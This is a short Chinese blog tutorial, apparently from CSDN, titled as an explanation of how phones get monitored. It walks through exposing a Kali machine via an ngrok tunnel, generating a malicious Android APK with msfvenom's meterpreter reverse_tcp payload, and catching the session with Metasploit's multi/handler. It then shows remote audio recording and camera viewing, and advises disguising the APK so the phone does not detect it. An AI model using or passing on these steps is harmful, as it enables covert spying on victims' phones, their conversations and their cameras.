你的手机是如何被监听的

内网转发的工具:http://www.ngrok.cc/ 注册一个账号 我们使用免费的隧道

你的手机是如何被监听的_第1张图片
你的手机是如何被监听的_第2张图片
你的手机是如何被监听的_第3张图片
你的手机是如何被监听的_第4张图片
你的手机是如何被监听的_第5张图片
二、我下载的是kail 版本的 解压缩名字是sunny文件 执行命令

./sunny  clientid id这里是上面的id 直接复制过来替换就好 回车

你的手机是如何被监听的_第6张图片

你的手机是如何被监听的_第7张图片
三、我们已经完成内网的ip 映射到公网 我们接下来做攻击安卓手机的playload 我们另起一个终端 生成攻击apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=你的域名在刚才ngrok上的二级域名 LPORT=映射的端口就是二级域名的端口 R > /root/apk.apk

在这里插入图片描述

四 、我们建立会话连接 msfconole 使用模块监听
1、使用监听模块

use exploit/multi/handler

2、选择Payload
set payload android/meterpreter/reverse_tcp
3、show options 查看参数设置
你的手机是如何被监听的_第8张图片
注意点:我们这里设置的是你的攻击kail的ip 应为你已经映射到公网、所以不管对方在哪 我们都可以快速监听。前提是我们捆绑apk的时候要注意,不被手机系统所察觉。

拿到会话我们就可以开启远程 我的上图是已经监听了 我们开始想要我们数据:

远程录音
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200411002012859.png)
查看手机摄像头
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200411002042341.png)

你的手机是如何被监听的_第9张图片

你可能感兴趣的:(kail,黑客工具使用)